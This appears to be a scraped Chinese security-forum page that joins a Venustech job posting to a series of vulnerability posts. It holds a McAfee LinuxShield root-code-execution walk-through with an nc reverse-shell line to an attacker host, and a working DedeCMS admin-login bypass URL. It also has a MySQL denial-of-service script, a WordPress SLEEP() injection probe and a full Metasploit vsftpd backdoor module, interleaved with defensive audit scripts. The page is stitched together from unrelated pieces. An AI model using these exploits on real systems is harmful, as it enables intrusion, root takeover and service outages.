
[Recruitment] [Hiring] Venustech (启明星辰) R&D recruitment

  • Position: other positions
  • Company: Venustech (启明星辰)
  • Location: Beijing
  • Major required: other
  • Education: bachelor's degree
  • Work experience: 2+ years
  • Salary: negotiable
  • Age: no requirement
  • Gender: no requirement
  • Company website: http://www.venustech.com.cn
  • Résumé e-mail: xiaoyan@sitedirsec.com
  • Contact phone: 00000000000
  • Online QQ:
  • Security assistant: recruitment and job-seeking via the 非安全中国 administrators, QQ group: 57116771


  • ++++++++++ Notes on Venustech (启明星辰) ++++++++++

    Just send me a private message on the forum.

I. R&D center: Linux C software engineer (several openings)

Responsibilities:

1. Software development and maintenance for embedded devices such as security gateways, firewalls and IPS.

Requirements:

1. Proficient in C programming.
2. Skilled with the Linux operating system; proficient in C programming under Linux.
3. Proficient in network protocols such as TCP/IP; familiar with application-layer protocols and protocol analysis.
4. Familiar with network security protocols and with security devices such as routers, switches and firewalls.
5. Familiar with the Linux kernel and kernel development.

II. R&D center: test engineer (several openings)

Responsibilities:

1. System testing and integration testing of products.
2. Writing, executing and revising product test cases.
3. Product performance testing.
4. Support and testing for external projects.

Requirements:

1. Basic knowledge of TCP/IP.
2. Good foundation in data communications.
3. Some familiarity with Linux.
4. Able to set up and use databases.
5. Familiar with at least one programming language: C/Perl/VBS/TCL.
6. Familiar with test-case design, system testing and stress testing.
7. Familiar with how firewalls work, with some understanding of firewall features.
8. Some understanding of how network security devices are deployed in a network.
9. Able to use test tools: LoadRunner, packet analysis software, Spirent or IXIA test equipment.

III. R&D center: security event engineer (several openings)

Responsibilities:

1. Delivery of trojan detection services and web vulnerability scanning services.
2. Technical support for service customers.
3. Research on web trojans, web vulnerabilities, worms, scanning, denial of service, buffer overflows and the like.
4. Routine upgrade and maintenance of the security event databases of products such as IDS/IPS/UTM/TDS/WAG/322.
5. Research on attack techniques, the TCP/IP protocol suite and reverse engineering.


非安全中国网 disclaimer: 1. All statements and images in this post are purely the personal opinion of the poster and unrelated to the position of this site; 2. This topic was posted by 小妍, who complies with the six management rules of the "Copyright and Disclaimer" and holds the associated rights; 3. Other organisations or individuals must obtain the consent of the poster 小妍 and of this site before using, reproducing or citing this post; 4. Parts of this post are reproduced from other media and published here to convey more information, which does not mean this site endorses their views or vouches for their accuracy; 5. If this post infringes the copyright of your site or of an individual, please notify this site immediately; it will be removed promptly with our sincere apologies; 6. Site administrators and moderators reserve the right to delete this post without prior notice to the poster.

McAfee LinuxShield local/remote code execution vulnerability
McAfee LinuxShield remote/local code
Affected versions: McAfee LinuxShield <= 1.5.1
Remote attack: Yes
Local overflow: Yes

Background:
===========

LinuxShield detects and removes viruses and other potentially unwanted
software on Linux-based systems. LinuxShield uses the powerful McAfee
scanning engine, the engine common to all our anti-virus products.

Although a few years ago, the Linux operating system was considered a
secure environment, it is now seeing more occurrences of software
specifically written to attack or exploit security weaknesses in
Linux-based systems. Increasingly, Linux-based systems interact with
Windows-based computers. Although viruses written to attack Windows-
based systems do not directly attack Linux systems, a Linux server
can harbor these viruses, ready to infect any client that connects to
it.

When installed on your Linux systems, LinuxShield provides protection
against viruses, Trojan horses, and other types of potentially
unwanted software.

LinuxShield scans files as they are opened and closed, a technique
known as on-access scanning. LinuxShield also incorporates an
on-demand scanner that enables you to scan any directory or file in
your host at any time.

When kept up-to-date with the latest virus-definition (DAT) files,
LinuxShield is an important part of your network security. We
recommend that you set up an anti-virus security policy for your
network, incorporating as many protective measures as possible.

LinuxShield uses a web-browser interface, and a large number of
LinuxShield installations can be centrally controlled by ePolicy
Orchestrator.

(Product description from LinuxShield Product Guide)

Description:
============

This vulnerability allows remote attackers to execute arbitrary code
on vulnerable installations of McAfee LinuxShield. User interaction
is not required to exploit this vulnerability, but an attacker must
be authenticated.

The LinuxShield web interface communicates with the locally installed
"nailsd" daemon, which listens on port 65443/tcp, to make
configuration changes, query the configuration and execute tasks.

Each user who can log in to the victim box can also authenticate
itself to the "nailsd" and can make configuration changes and
execute tasks with root privileges.

A direct execution of commands is not possible, but it is possible to
download and execute code through manipulation of the config and
execution of scheduled tasks of the LinuxShield.

walk-through (after the TLS handshake):
+--------------------------------------

    nailsd  > +OK welcome to the NAILS Statistics Service
    attacker> auth <user> <pass>
    nailsd  > +OK successful authentication

    # Set the Attacker repository to download our code from a httpd
    # (catalog.z)
    #---------------------------------------------------------------
    attacker> db set 1 _table=repository status=1 siteList=<?xml version="1.0" encoding="UTF-8"?><ns:SiteLists xmlns:ns="naSiteList" GlobalVersion="20030131003110" LocalVersion="20091209161903" Type="Client"><SiteList Default="1" Name="SomeGUID"><HttpSite Type="repository" Name="EvilRepo" Order="1" Server="<attackerhost>:80" Enabled="1" Local="1"><RelativePath>nai</RelativePath><UseAuth>0</UseAuth><UserName></UserName><Password Encrypted="0"/></HttpSite></SiteList></ns:SiteLists> _cmd=update
    nailsd  > +OK database changes buffered.

    # Execute task to set the attacker repository
    #---------------------------------------------------------------
    attacker> task setsitelist
    nailsd  > +OK setting sitelist from CMA.

    # Execute the default Update task to download the code
    #---------------------------------------------------------------
    attacker> task nstart LinuxShield Update
    nailsd  > +OK task LinuxShield Update starting

    # Create a Scan profile, which executes our code. The profiles are
    # not stored in the database.
    # Scan Profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg
    #---------------------------------------------------------------
    attacker> sconf ODS_99 begin
    nailsd  > +OK 1260400888

    # Set the variable "nailsd.profile.ODS_99.scannerPath" to the path
    # where our earlier downloaded catalog.z file is stored.
    # (/opt/McAfee/cma/scratch/update/catalog.z)
    #---------------------------------------------------------------
    attacker> sconf ODS_99 set 1260400888 nailsd.profile.ODS_99.allFiles=true nailsd.profile.ODS_99.childInitTmo=60 nailsd.profile.ODS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=10000 nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/engine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.profile.ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibDir=/opt/NAI/LinuxShield/engine/lib nailsd.profile.ODS_99.enginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so nailsd.profile.ODS_99.factoryInitTmo=60 nailsd.profile.ODS_99.heuristicAnalysis=true nailsd.profile.ODS_99.macroAnalysis=true nailsd.profile.ODS_99.maxQueSize=32 nailsd.profile.ODS_99.mime=true nailsd.profile.ODS_99.noJokes=false nailsd.profile.ODS_99.program=true nailsd.profile.ODS_99.quarantineChildren=1 nailsd.profile.ODS_99.quarantineDirectory=/quarantine nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.profile.ODS_99.scanChildren=2 nailsd.profile.ODS_99.scanMaxTmo=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profile.ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=true nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scratch/update/catalog.z nailsd.profile.ODS_99.scansPerChild=10000 nailsd.profile.ODS_99.slowScanChildren=0 nailsd.profile.ODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.filter.0.path=/proc nailsd.profile.ODS_99.filter.0.subdir=true nailsd.profile.ODS_99.filter.extensions.mode=all nailsd.profile.ODS_99.filter.extensions.type=extension nailsd.profile.ODS_99.action.Default.primary=Clean nailsd.profile.ODS_99.action.Default.secondary=Quarantine nailsd.profile.ODS_99.action.App.primary=Clean nailsd.profile.ODS_99.action.App.secondary=Quarantine nailsd.profile.ODS_99.action.timeout=Pass nailsd.profile.ODS_99.action.error=Block
    nailsd  > +OK configuration changes buffered
    attacker> sconf ODS_99 commit 1260400888
    nailsd  > +OK configuration changes stored

    # Set a scan task with the manipulated profile to execute the code
    #---------------------------------------------------------------
    attacker> db set 1260400888 _table=schedule taskName=Evil Task taskType=On-Demand taskInfo=profileName=ODS_99,paths=path:/root/tmp;exclude:false timetable=type=unscheduled taskResults=0 i_lastRun=1260318482 status=Stopped _cmd=insert
    nailsd  > +OK database changes buffered

    # Execute scan task to execute the code
    #---------------------------------------------------------------
    attacker> task nstart Evil Task

+-------------------------------------- walk-through EOF

To get a reverse root shell place something like this in the catalog.z

    --- snip ---
    #!/bin/sh
    nc -nv <attacker_host> 4444 -e /bin/sh
    --- /snip ---

Proof of Concept:
==================

http://inj3ct0r.com/sploits/11165.tar.gz

Solution:
=========

McAfee Advisory
+--------------
https://kc.mcafee.com/corporate/index?page=content&id=SB10007

Disclosure Timeline (YYYY/MM/DD):
=================================

2009.12.07: Vulnerability found
2010.02.03: Asked vendor for a PGP key
2010.02.05: Vendor sent his PGP key
2010.02.05: Sent PoC, Advisory, Disclosure policy and planned disclosure date (2010.02.18) to Vendor
2010.02.05: Vendor acknowledges the reception of the advisory
2010.02.16: Ask for a status update, because the planned release date is 2010.02.18.
2010.02.16: Vendor responds that they are currently working on a patch
2010.02.17: Changed release date to 2010.02.25.
2010.02.22: Vendor gives a status update that they are able to release the patch on 2010.02.25.
2010.02.24: Ask for a list of affected products and the advisory URL.
2010.02.24: Vendor sends the list.
2010.03.02: Release of this Advisory

Notice: https://www.sitedirsec.com publishes the latest vulnerabilities, please follow.
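The walk-through above tampers with two objects on the host: the repository site list (so the update task fetches catalog.z from a host the attacker picks) and an on-demand scan profile whose scannerPath points at that download. The Python below is an added example, not McAfee's code: an audit that reads profile settings in the same "nailsd.profile.<name>.<key>=<value>" form the sconf command uses, parses a siteList document like the one in the walk-through, and flags a profile that loads code from outside the engine directory or a repository whose server is not on the operator's approved list. The on-disk layout of ods.cfg, the approved-host list, the hypothetical libscanner.so default and all sample values are assumptions.

```python
import xml.etree.ElementTree as ET

# Added audit example (not McAfee code). Profile settings are assumed to be
# available as whitespace-separated key=value tokens, the form the walk-through's
# "sconf ODS_99 set" command uses; the real ods.cfg layout is not shown on the page.

ENGINE_DIR = "/opt/NAI/LinuxShield/engine/"      # from the enginePath/engineLibDir values above
APPROVED_UPDATE_HOSTS = {"update.example.com"}   # constructed operator allow-list
CODE_SETTINGS = ("scannerPath", "enginePath", "engineLibDir")


def parse_profile_settings(text):
    """Split key=value tokens into a dict (values here contain no spaces)."""
    settings = {}
    for tok in text.split():
        if "=" in tok:
            key, value = tok.split("=", 1)
            settings[key] = value
    return settings


def audit_profiles(settings):
    """One finding per profile setting that would load code from outside ENGINE_DIR."""
    findings = []
    for key, value in sorted(settings.items()):
        parts = key.split(".")
        if len(parts) != 4 or parts[:2] != ["nailsd", "profile"]:
            continue
        profile, setting = parts[2], parts[3]
        if setting in CODE_SETTINGS and not value.startswith(ENGINE_DIR):
            findings.append(f"profile {profile}: {setting} outside {ENGINE_DIR}: {value}")
    return findings


def audit_sitelist(xml_text):
    """One finding per HttpSite whose server host is not an approved update host."""
    root = ET.fromstring(xml_text)
    findings = []
    # HttpSite carries no namespace prefix in the page's XML, so the bare tag matches.
    for site in root.iter("HttpSite"):
        server = site.get("Server", "")
        host = server.rsplit(":", 1)[0] if ":" in server else server
        if host not in APPROVED_UPDATE_HOSTS:
            findings.append(f"repository {site.get('Name')!r}: unapproved server {server}")
    return findings


def audit(settings_text, sitelist_xml):
    """Combined report over both objects the walk-through modifies."""
    return audit_profiles(parse_profile_settings(settings_text)) + audit_sitelist(sitelist_xml)


# Constructed samples: a benign profile (libscanner.so is a made-up default), a
# profile shaped like ODS_99 above, and a site list with one approved and one
# rogue repository (TEST-NET address instead of a real host).
GOOD_PROFILE = ("nailsd.profile.ODS_1.enginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so "
                "nailsd.profile.ODS_1.scannerPath=/opt/NAI/LinuxShield/engine/lib/libscanner.so")
BAD_PROFILE = ("nailsd.profile.ODS_99.enginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so "
               "nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scratch/update/catalog.z")
SITELIST = ('<ns:SiteLists xmlns:ns="naSiteList" Type="Client">'
            '<SiteList Default="1" Name="SomeGUID">'
            '<HttpSite Type="repository" Name="Corp" Order="1" Server="update.example.com:80" Enabled="1"/>'
            '<HttpSite Type="repository" Name="EvilRepo" Order="2" Server="203.0.113.5:80" Enabled="1"/>'
            '</SiteList></ns:SiteLists>')

if __name__ == "__main__":
    for line in audit(GOOD_PROFILE + " " + BAD_PROFILE, SITELIST):
        print(line)
```

Run it as-is to see the two findings; point `audit()` at the real profile dump and the repository row's siteList column to use it on a host.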

Multiple security vulnerabilities in the Django web framework
Published: 2011-09-12

Affected versions:
Django 1.2.5
Django 1.3 beta 1
Django 1.2.4
Django 1.2.2
Django 1.2

Vulnerability description:

Django is an open-source web application framework written in Python.
Django has multiple security vulnerabilities that allow an attacker to obtain sensitive information, manipulate data, carry out cache poisoning attacks or cause a denial of service.
1) When a cache backend is used, there is an error in how django.contrib.sessions handles sessions, which can be exploited to manipulate session data. Successful exploitation requires the session key to be known and the application to let the attacker store dictionary-like objects in the cache under a valid session key.
2) Django's model system includes a field type, URLField, which validates that a supplied value is a legitimate URL; if the boolean keyword argument verify_exists is true, it also tries to fetch and parse the supplied URL. By default the underlying socket has no timeout, so an attacker can send a specially crafted URL that consumes all of the server's memory, causing a denial of service.
3) There is an error in the handling of redirect responses when validating URLs supplied to the "URLField" field type; an attacker can exploit this by returning a redirect to a "file://" URL and determine whether local files exist on the server.
4) There is an error in the handling of the "X-Forwarded-Host" HTTP header when generating the full URL for redirect responses; an attacker can exploit this for cache poisoning attacks.

References:
https://www.djangoproject.com/weblog/2011/sep/09/security-releases-issued/
http://secunia.com/advisories/45939/
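Item 4 above concerns redirects whose absolute URL is built from a client-supplied X-Forwarded-Host, so that a shared cache can end up storing a Location the attacker chose. The Python below is an added example, not Django's own code: the pre-fix behaviour next to a hardened version that honours X-Forwarded-Host only when the deployment declares a trusted proxy sets it, and that checks the resulting host against an allow-list. The allow-list syntax (exact host, leading dot for any subdomain, "*" for everything) mirrors what Django later introduced as ALLOWED_HOSTS. The header dict, host names and helper names are assumptions.

```python
import re

# Added example (not Django's code). Headers are a plain dict; IPv6 host literals
# are not handled by the syntax check, to keep the regex readable.
HOST_RE = re.compile(
    r"^([a-z0-9](?:[a-z0-9-]*[a-z0-9])?(?:\.[a-z0-9](?:[a-z0-9-]*[a-z0-9])?)*\.?)(:\d{1,5})?$",
    re.IGNORECASE,
)


class DisallowedHost(ValueError):
    """The request's host is syntactically bad or not on the allow-list."""


def host_matches(host, pattern):
    """Allow-list match: exact name, '.example.com' for domain + subdomains, '*' for all."""
    host = host.rstrip(".").lower()
    pattern = pattern.lower()
    if pattern == "*":
        return True
    if pattern.startswith("."):
        return host == pattern[1:] or host.endswith(pattern)
    return host == pattern


def get_host(headers, allowed_hosts, use_forwarded_host=False):
    """Return the validated host[:port] to use when building absolute URLs.

    X-Forwarded-Host is consulted only when the deployment explicitly opts in,
    because without a trusted proxy in front the header is attacker-controlled.
    """
    if use_forwarded_host and "X-Forwarded-Host" in headers:
        raw = headers["X-Forwarded-Host"].split(",")[0].strip()
    else:
        raw = headers.get("Host", "")
    m = HOST_RE.match(raw)
    if not m:
        raise DisallowedHost(f"invalid Host header: {raw!r}")
    domain = m.group(1)                     # host without the port
    if not any(host_matches(domain, p) for p in allowed_hosts):
        raise DisallowedHost(f"host not allowed: {domain!r}")
    return raw


def is_host_allowed(headers, allowed_hosts, use_forwarded_host=False):
    """Boolean wrapper around get_host() for callers that do not want the exception."""
    try:
        get_host(headers, allowed_hosts, use_forwarded_host)
        return True
    except DisallowedHost:
        return False


def vulnerable_redirect_url(headers, location, scheme="https"):
    """Pre-fix behaviour from item 4: X-Forwarded-Host wins unconditionally."""
    host = headers.get("X-Forwarded-Host") or headers["Host"]
    return f"{scheme}://{host}{location}"


def safe_redirect_url(headers, allowed_hosts, location, scheme="https", use_forwarded_host=False):
    """Hardened form: the host is validated before it is baked into the Location."""
    host = get_host(headers, allowed_hosts, use_forwarded_host)
    return f"{scheme}://{host}{location}"


# Constructed request: no proxy in front, yet the client sent X-Forwarded-Host.
# A cache storing the redirect would replay the forged Location to later visitors.
FORGED = {"Host": "shop.example.com", "X-Forwarded-Host": "attacker.example.net"}

if __name__ == "__main__":
    print("vulnerable:", vulnerable_redirect_url(FORGED, "/login/"))
    print("hardened:  ", safe_redirect_url(FORGED, [".example.com"], "/login/"))
```

The hardened function refuses the forged header in two independent ways: it ignores X-Forwarded-Host unless the deployment opts in, and even then the value must match the allow-list.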

Step-by-step Linux installation guide: setting up the virtual machine tools
http://www.sitedir.com.cn/video/8.swf

DedeCMS (织梦) v5.6-5.7 unauthorized access vulnerability
http://www.XXXX.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

Change validate=dcug above to the current captcha value and you get straight into the site's admin backend.

The precondition for this vulnerability is that the backend path must be known.

Official temporary fix:

Find the file include/common.inc.php and replace:

    foreach($_REQUEST as $_k=>$_v)
    {
        var_dump($_k);
        if( strlen($_k)>0 && preg_match('#^(cfg_|GLOBALS)#',$_k) )
        {
            exit('Request var not allow!');
        }
    }

with:

    // Check and register externally submitted variables.
    // Recurses into nested arrays, so a key such as GLOBALS inside
    // _POST[GLOBALS][...] is caught one level down.
    function CheckRequest(&$val) {
        if (is_array($val)) {
            foreach ($val as $_k=>$_v) {
                CheckRequest($_k);
                CheckRequest($val[$_k]);
            }
        } else
        {
            if( strlen($val)>0 && preg_match('#^(cfg_|GLOBALS)#',$val) )
            {
                exit('Request var not allow!');
            }
        }
    }
    CheckRequest($_REQUEST);
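Why the patch recurses: PHP expands a parameter name such as _POST[GLOBALS][cfg_dbhost] into nested arrays, so the original loop, which inspects only the top-level keys of $_REQUEST, sees `_POST` and accepts the request, while CheckRequest() reaches the `GLOBALS` key one level down. The Python below is an added example, not DedeCMS code: a simplified port of both checks over a PHP-style query parser, run on a constructed query with the shape of the PoC URL (TEST-NET address instead of a real host). The function names and the parser's simplifications are assumptions.

```python
import re
from urllib.parse import parse_qsl

# Added example (not DedeCMS code): port of the original flat loop and of the
# patched recursive CheckRequest() over a PHP-style $_REQUEST structure.
FORBIDDEN = re.compile(r"^(cfg_|GLOBALS)")   # same pattern as the PHP code


def parse_php_query(query):
    """Turn a query string into nested dicts the way PHP builds $_REQUEST.

    Simplified: a[b][c]=v -> {'a': {'b': {'c': 'v'}}}. Empty brackets ("a[]")
    and a scalar and an array sharing one name are not modelled.
    """
    result = {}
    for raw_key, value in parse_qsl(query, keep_blank_values=True):
        m = re.match(r"^([^\[]+)((?:\[[^\]]*\])*)$", raw_key)
        if not m:
            continue                          # malformed name, skipped
        path = [m.group(1)] + re.findall(r"\[([^\]]*)\]", m.group(2))
        node = result
        for part in path[:-1]:
            node = node.setdefault(part, {})
            if not isinstance(node, dict):
                break                         # a scalar already lives here
        else:
            node[path[-1]] = value
    return result


def shallow_check(request):
    """Port of the original loop: only top-level keys are inspected.
    Returns True when the request would be accepted."""
    return not any(len(k) > 0 and FORBIDDEN.match(k) for k in request)


def recursive_check(val):
    """Port of the patched CheckRequest(): every key and value at every depth."""
    if isinstance(val, dict):
        return all(recursive_check(k) and recursive_check(v) for k, v in val.items())
    return not (len(val) > 0 and FORBIDDEN.match(val))


def evaluate(query):
    """Return (accepted_by_original_check, accepted_by_patched_check)."""
    req = parse_php_query(query)
    return shallow_check(req), recursive_check(req)


# Constructed queries: an ordinary login and one with the nested-key shape of
# the PoC on this page (203.0.113.10 is a TEST-NET address, not a real host).
BENIGN = "dopost=login&userid=admin&pwd=secret"
OVERRIDE = "dopost=login&userid=admin&_POST[GLOBALS][cfg_dbhost]=203.0.113.10"

if __name__ == "__main__":
    for q in (BENIGN, OVERRIDE):
        print(q, "->", "original/patched accept:", evaluate(q))
```

The top-level keys of the second query are dopost, userid and _POST, none of which start with cfg_ or GLOBALS, which is exactly why the flat loop let the config override through.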

Step-by-step Linux installation guide: setting up the virtual machine
http://www.sitedir.com.cn/video/4.swf

MySQL 5.5.8 remote denial of service vulnerability

    # Script as posted, brought to Python 3 (print() and byte strings); the
    # forum rendering had stripped the "\x" escapes, restored here.
    import socket
    import sys

    print("\n")
    print("----------------------------------------------------------------")
    print("| MySQL 5.5.8 Null Ptr (windows)                                |")
    print("| Level Smash the Stack                                         |")
    print("----------------------------------------------------------------")
    print("\n")

    # Packet bytes reproduced as posted: the leading "&" (0x26 = 38, the
    # 3-byte packet length) and the "autocommit30" text appear this way in
    # the original post.
    buf = (b"&\x00\x00\x01\x85\xa2\x03\x00\x00\x00\x00@\x93\x00\x00\x00\x00\x00\x00\x00\x00"
           b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00root\x00\x00")

    buf2 = b"\x11\x00\x00\x00\x03set autocommit30"

    def usage():
        print("usage : ./mysql.py <victim_ip>")
        print("example: ./mysql.py 192.168.1.22")

    def main():
        if len(sys.argv) != 2:
            usage()
            sys.exit()
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

        HOST = sys.argv[1]
        PORT = 3306
        s.connect((HOST, PORT))
        print("\n* Connect")
        s.send(buf)
        print("\n* Payload 1 sent")
        s.send(buf2)
        print("\n* Payload 2 sent\n", "\n* Run again to ensure it is down..\n")
        s.close()

    if __name__ == "__main__":
        main()

WordPress Event List Plugin <= 0.7.8 - SQL injection vulnerability
1. Description:

SQL injection vulnerability in the Event List plugin 0.7.8 for WordPress
allows an authenticated user to execute arbitrary SQL commands via the id
parameter to wp-admin/admin.php.

2. Proof of Concept:

http://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&action=edit&id=1 AND SLEEP(10)

3. Solution:

The plugin has been removed from WordPress. Deactivate the plug-in and wait
for a hotfix.

4. Reference:

http://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-injection-sqli/
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429
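For whoever is on the receiving end of the probe above: a time-based injection attempt leaves a recognisable trace in the web server's access log, namely a SLEEP() call in the id parameter of an admin.php request together with a response that took about as long as the requested sleep. The Python below is an added example, not code from the plugin or from WordPress; the log format (combined format with a trailing response-time field in milliseconds), the 5-second corroboration threshold and the sample lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Added detection example (not plugin or WordPress code). Assumed log layout:
# combined format with the request duration in milliseconds as a final field.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "[^"]*" "[^"]*" (?P<ms>\d+)$'
)
# Functions that stall a query; the probe on this page uses SLEEP().
TIME_SQLI_RE = re.compile(r'\b(SLEEP|BENCHMARK|PG_SLEEP|WAITFOR)\s*\(', re.IGNORECASE)
DELAY_THRESHOLD_MS = 5000     # assumed: a sleep that fired pushes the response past this


def inspect_line(line):
    """Return a finding dict for a suspicious admin.php request, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not parts.path.endswith("/wp-admin/admin.php"):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)   # percent-decodes values
    tainted = sorted(
        name for name, values in params.items()
        if any(TIME_SQLI_RE.search(v) for v in values)
    )
    if not tainted:
        return None
    ms = int(m.group("ms"))
    return {
        "ip": m.group("ip"),
        "user": m.group("user"),
        "page": params.get("page", [""])[0],
        "params": tainted,
        "response_ms": ms,
        "delay_observed": ms >= DELAY_THRESHOLD_MS,   # the injected sleep actually ran
    }


def scan(lines):
    """Run inspect_line over an iterable of log lines and collect the findings."""
    return [f for f in (inspect_line(l) for l in lines) if f]


# Constructed sample log: an ordinary edit, a timing probe that cost ~10 s, and noise.
SAMPLE_LOG = [
    '203.0.113.7 - editor [12/Jun/2017:10:01:02 +0000] "GET /wp-admin/admin.php?page=el_admin_main&action=edit&id=3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0" 84',
    '203.0.113.7 - editor [12/Jun/2017:10:01:20 +0000] "GET /wp-admin/admin.php?page=el_admin_main&action=edit&id=1%20AND%20SLEEP(10) HTTP/1.1" 200 5120 "-" "Mozilla/5.0" 10042',
    '198.51.100.9 - - [12/Jun/2017:10:02:00 +0000] "GET /index.php?p=1 HTTP/1.1" 200 900 "-" "curl/7.52" 12',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The delay_observed flag is what separates a scanner merely sending the string from an injection that actually executed: the response time of the probe line lines up with SLEEP(10), which is the signal to escalate.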

VSFTPD v2.3.4 backdoor command execution vulnerability

    ##
    # $Id: vsftpd_234_backdoor.rb 13099 2011-07-05 05:20:47Z hdm $
    ##

    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/framework/
    ##

    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Exploit::Remote::Tcp

      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'VSFTPD v2.3.4 Backdoor Command Execution',
          'Description'    => %q{
            This module exploits a malicious backdoor that was added to the VSFTPD download
            archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between
            June 30th 2011 and July 1st 2011 according to the most recent information
            available. This backdoor was removed on July 3rd 2011.
          },
          'Author'         => [ 'hdm', 'mc' ],
          'License'        => MSF_LICENSE,
          'Version'        => '$Revision: 13099 $',
          'References'     =>
            [
              [ 'URL', 'http://pastebin.com/AetT9sS5' ],
              [ 'URL', 'http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html' ]
            ],
          'Privileged'     => true,
          'Platform'       => [ 'unix' ],
          'Arch'           => ARCH_CMD,
          'Payload'        =>
            {
              'Space'       => 2000,
              'BadChars'    => '',
              'DisableNops' => true,
              'Compat'      =>
                {
                  'PayloadType'    => 'cmd_interact',
                  'ConnectionType' => 'find'
                }
            },
          'Targets'        =>
            [
              [ 'Automatic', { } ]
            ],
          'DisclosureDate' => 'Jul 3 2011',
          'DefaultTarget'  => 0))

        register_options([ Opt::RPORT(21) ], self.class)
      end

      def exploit

        # If the backdoor listener is already up, skip the trigger and go straight to it
        nsock = self.connect(false, {'RPORT' => 6200}) rescue nil
        if nsock
          print_status("The port used by the backdoor bind listener is already open")
          handle_backdoor(nsock)
          return
        end

        # Connect to the FTP service port first
        connect

        banner = sock.get_once(-1, 30).to_s
        print_status("Banner: #{banner.strip}")

        # The backdoor is triggered by a username containing ":)"
        sock.put("USER #{rand_text_alphanumeric(rand(6)+1)}:)\r\n")
        resp = sock.get_once(-1, 30).to_s
        print_status("USER: #{resp.strip}")

        if resp =~ /^530 /
          print_error("This server is configured for anonymous only and the backdoor code cannot be reached")
          disconnect
          return
        end

        if resp !~ /^331 /
          print_error("This server did not respond as expected: #{resp.strip}")
          disconnect
          return
        end

        sock.put("PASS #{rand_text_alphanumeric(rand(6)+1)}\r\n")

        # Do not bother reading the response from password, just try the backdoor
        nsock = self.connect(false, {'RPORT' => 6200}) rescue nil
        if nsock
          print_good("Backdoor service has been spawned, handling...")
          handle_backdoor(nsock)
          return
        end

        disconnect

      end

      def handle_backdoor(s)

        s.put("id\n")

        r = s.get_once(-1, 5).to_s
        if r !~ /uid=/
          print_error("The service on port 6200 does not appear to be a shell")
          disconnect(s)
          return
        end

        print_good("UID: #{r.strip}")

        s.put("nohup " + payload.encoded + " >/dev/null 2>&1")
        handler(s)
      end

    end
